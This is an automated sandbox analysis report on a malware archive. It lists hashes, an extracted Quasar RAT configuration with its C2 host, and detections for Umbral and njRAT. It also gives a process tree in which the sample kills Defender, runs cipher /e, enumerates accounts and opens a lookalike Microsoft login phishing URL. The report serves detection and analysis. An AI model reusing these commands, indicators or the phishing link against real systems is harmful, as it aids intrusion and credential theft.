Resubmissions

28-05-2024 21:39

240528-1h2bvadd2x 10

28-05-2024 21:26

240528-1apcbach8x 10

Analysis

  • max time kernel
    366s
  • max time network
    373s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-05-2024 21:26

Errors

Reason
Machine shutdown

General

  • Target

    VIR Virus.zip

  • Size

    295.2MB

  • MD5

    4568557191778f07e87931a3cb8bb19f

  • SHA1

    2de50b104aaa20166ac4a5ca54ffa2f7a10967ff

  • SHA256

    10749906bc204c15934fdba1c3c5bb113156aadacd47d8609a3e543620f05c9a

  • SHA512

    e29c43a141e5b83bb83bbb2cb86ce7b2b100163e1ec5557522cf4b6c5d2e83066539b4359f0adce282517300d5ce988e7c7f88a03b8d984c303a49033b915d6c

  • SSDEEP

    6291456:iw1tbMVOw5GAdBLYWk8KmMzMr+Z3NaUSCs5rTZ/eLRl5:i8QhooYQKtzMr+ZdG/Y

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 3 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Windows security bypass 2 TTPs 2 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 6 IoCs
  • Manipulates Digital Signatures 1 TTPs 2 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • .NET Reactor proctector 30 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 21 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 32 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 14 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 7 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\VIR Virus.zip"
    1⤵
      PID:4228
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /7
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:916
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:2112
      • C:\Users\Admin\Desktop\vir.exe
        "C:\Users\Admin\Desktop\vir.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4032
        • C:\Users\Admin\AppData\Local\Temp\328b2acb-8a07-4263-b588-a71ac9ca8225\ProgressBarSplash.exe
          "C:\Users\Admin\AppData\Local\Temp\328b2acb-8a07-4263-b588-a71ac9ca8225\ProgressBarSplash.exe" -unpacking
          2⤵
          • Executes dropped EXE
          PID:2860
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\!main.cmd" "
          2⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1064
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K spread.cmd
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:32
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy 1 C:\Users\Admin\Desktop
              4⤵
              • Enumerates system info in registry
              PID:960
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy 2 C:\Users\Admin\Desktop
              4⤵
              • Enumerates system info in registry
              PID:1872
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy 3 C:\Users\Admin\
              4⤵
              • Enumerates system info in registry
              PID:64
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K doxx.cmd
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2044
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig
              4⤵
              • Gathers network information
              PID:2112
            • C:\Windows\SysWOW64\net.exe
              net accounts
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4472
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 accounts
                5⤵
                  PID:4500
              • C:\Windows\SysWOW64\net.exe
                net user
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1156
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 user
                  5⤵
                    PID:1448
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /apps /v /fo table
                  4⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4668
              • C:\Windows\SysWOW64\PING.EXE
                ping google.com -t -n 1 -s 4 -4
                3⤵
                • Runs ping.exe
                PID:4284
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im WindowsDefender.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2588
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K handler.cmd
                3⤵
                  PID:636
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2
                  3⤵
                  • Manipulates Digital Signatures
                  • Enumerates system info in registry
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of WriteProcessMemory
                  PID:3596
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffba9be46f8,0x7ffba9be4708,0x7ffba9be4718
                    4⤵
                      PID:1312
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
                      4⤵
                        PID:4480
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
                        4⤵
                          PID:536
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
                          4⤵
                            PID:540
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                            4⤵
                              PID:4600
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                              4⤵
                                PID:4308
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
                                4⤵
                                  PID:5420
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
                                  4⤵
                                    PID:4184
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
                                    4⤵
                                      PID:4428
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
                                      4⤵
                                        PID:5612
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
                                        4⤵
                                          PID:5432
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:8
                                          4⤵
                                            PID:5520
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:8
                                            4⤵
                                              PID:4176
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
                                              4⤵
                                                PID:6192
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
                                                4⤵
                                                  PID:6264
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
                                                  4⤵
                                                    PID:6272
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6600 /prefetch:2
                                                    4⤵
                                                      PID:5336
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1
                                                      4⤵
                                                        PID:7004
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
                                                        4⤵
                                                          PID:3636
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1
                                                          4⤵
                                                            PID:4328
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
                                                            4⤵
                                                              PID:6564
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,4378251580366987500,3009194195506527947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
                                                              4⤵
                                                                PID:6948
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /K cipher.cmd
                                                              3⤵
                                                                PID:4080
                                                                • C:\Windows\SysWOW64\cipher.exe
                                                                  cipher /e
                                                                  4⤵
                                                                    PID:3608
                                                                  • C:\Windows\SysWOW64\cipher.exe
                                                                    cipher /e
                                                                    4⤵
                                                                      PID:1696
                                                                    • C:\Windows\SysWOW64\cipher.exe
                                                                      cipher /e
                                                                      4⤵
                                                                        PID:3280
                                                                      • C:\Windows\SysWOW64\cipher.exe
                                                                        cipher /e
                                                                        4⤵
                                                                          PID:5076
                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\Rover.exe
                                                                        Rover.exe
                                                                        3⤵
                                                                        • Modifies WinLogon for persistence
                                                                        • UAC bypass
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        • Drops file in Program Files directory
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • System policy modification
                                                                        PID:1136
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\web.htm
                                                                        3⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:3684
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffba9be46f8,0x7ffba9be4708,0x7ffba9be4718
                                                                          4⤵
                                                                            PID:1224
                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\Google.exe
                                                                          Google.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:2264
                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\helper.vbs"
                                                                          3⤵
                                                                            PID:5172
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping google.com -t -n 1 -s 4 -4
                                                                            3⤵
                                                                            • Runs ping.exe
                                                                            PID:2368
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping mrbeast.codes -t -n 1 -s 4 -4
                                                                            3⤵
                                                                            • Runs ping.exe
                                                                            PID:5604
                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                            xcopy Google.exe C:\Users\Admin\Desktop
                                                                            3⤵
                                                                            • Enumerates system info in registry
                                                                            PID:6084
                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                            xcopy Rover.exe C:\Users\Admin\Desktop
                                                                            3⤵
                                                                            • Enumerates system info in registry
                                                                            PID:5784
                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                            xcopy spinner.gif C:\Users\Admin\Desktop
                                                                            3⤵
                                                                            • Enumerates system info in registry
                                                                            PID:4512
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /K bloatware.cmd
                                                                            3⤵
                                                                            • Checks computer location settings
                                                                            • Modifies registry class
                                                                            PID:5388
                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\bloatware\1.exe
                                                                              1.exe
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Drops file in Program Files directory
                                                                              • Modifies registry class
                                                                              PID:5408
                                                                              • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                                                "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:1760
                                                                                • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                                                  "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{F57D4CFF-0C94-4822-A149-882008BD312C} {EF54F48B-C29F-40CD-8554-5CABC42E96FD} 1760
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:6140
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c install.bat
                                                                                5⤵
                                                                                  PID:4132
                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                    regsvr32 /s "DroidCamFilter32.ax"
                                                                                    6⤵
                                                                                    • Loads dropped DLL
                                                                                    • Modifies registry class
                                                                                    PID:5172
                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                    regsvr32 /s "DroidCamFilter64.ax"
                                                                                    6⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:2352
                                                                                    • C:\Windows\system32\regsvr32.exe
                                                                                      /s "DroidCamFilter64.ax"
                                                                                      7⤵
                                                                                      • Loads dropped DLL
                                                                                      • Registers COM server for autorun
                                                                                      • Modifies registry class
                                                                                      PID:5888
                                                                                • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                                                  "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +v
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Windows directory
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5604
                                                                                • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                                                  "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Windows directory
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2408
                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\bloatware\3.exe
                                                                                3.exe
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies registry class
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5352
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1804
                                                                                  5⤵
                                                                                  • Program crash
                                                                                  PID:1892
                                                                              • C:\Windows\SysWOW64\mshta.exe
